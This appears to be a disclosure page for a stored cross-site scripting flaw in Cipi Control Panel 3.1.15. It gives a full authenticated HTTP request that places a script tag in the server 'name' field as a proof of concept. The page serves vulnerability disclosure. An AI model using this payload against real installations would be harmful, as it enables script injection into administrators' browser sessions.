Cipi Control Panel 3.1.15 Cross Site Scripting

2022-03-02 / 2022-03-03

Credit: Fikrat Ghuliev

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu
When the user wants to add a new server on the "Server" panel, in "name"
parameter has not had any filtration.
POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cipi Control Panel 3.1.15 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.